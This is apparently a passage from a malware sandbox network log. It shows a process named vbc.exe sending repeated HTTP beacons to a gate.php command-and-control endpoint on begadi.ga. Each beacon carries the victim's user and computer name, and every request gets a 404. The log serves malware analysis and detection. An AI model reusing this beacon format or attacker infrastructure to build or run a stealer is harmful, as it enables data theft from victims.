Dec 21, 2020 08:33:35.037787914 CET	623	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:35.166301012 CET	623	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.22	49227	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:03.371543884 CET	697	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:03.430640936 CET	697	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:03.553005934 CET	698	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.22	49228	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:03.833935022 CET	698	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:03.899218082 CET	699	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:04.038429976 CET	699	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.22	49229	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:04.292102098 CET	700	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:04.351355076 CET	700	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:04.473880053 CET	700	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.2.22	49230	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:04.727065086 CET	701	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:04.786632061 CET	701	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:04.906800032 CET	702	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.2.22	49231	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:05.184514999 CET	702	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:05.243503094 CET	703	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:05.370029926 CET	703	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.2.22	49232	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:05.631099939 CET	704	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:05.690062046 CET	704	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:05.812973022 CET	704	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.2.22	49233	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:06.072212934 CET	705	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:06.129213095 CET	705	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:06.257530928 CET	706	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.2.22	49234	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:06.518841982 CET	707	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:06.577920914 CET	707	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:06.707418919 CET	707	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.2.22	49235	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:06.975399017 CET	708	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:07.041409969 CET	708	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:07.170943022 CET	709	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.2.22	49236	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:07.433149099 CET	709	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:07.492361069 CET	710	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:07.616414070 CET	710	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.22	49174	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:35.458679914 CET	624	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:35.517251968 CET	624	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:35.642134905 CET	625	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	192.168.2.22	49237	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:07.882491112 CET	711	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:07.946084976 CET	711	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:08.079046011 CET	711	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	192.168.2.22	49238	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:08.329480886 CET	712	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:08.389296055 CET	712	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:08.518978119 CET	713	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	192.168.2.22	49239	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:08.775652885 CET	713	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:08.834712982 CET	714	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:08.962409019 CET	714	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	192.168.2.22	49240	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:09.232918024 CET	715	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:09.291323900 CET	715	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:09.421864033 CET	715	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	192.168.2.22	49241	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:09.685127020 CET	716	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:09.749680996 CET	716	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:09.882205009 CET	717	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	192.168.2.22	49242	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:10.151638985 CET	718	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:10.213010073 CET	718	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:10.347270966 CET	718	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	192.168.2.22	49243	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:10.607949018 CET	719	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:10.667370081 CET	719	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:10.794915915 CET	719	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	192.168.2.22	49244	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:11.045496941 CET	720	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:11.110836983 CET	721	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:11.244723082 CET	721	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	192.168.2.22	49245	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:11.501199007 CET	722	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:11.558350086 CET	722	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:11.678663969 CET	722	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	192.168.2.22	49246	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:11.935915947 CET	723	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:12.000009060 CET	723	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:12.130192995 CET	724	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

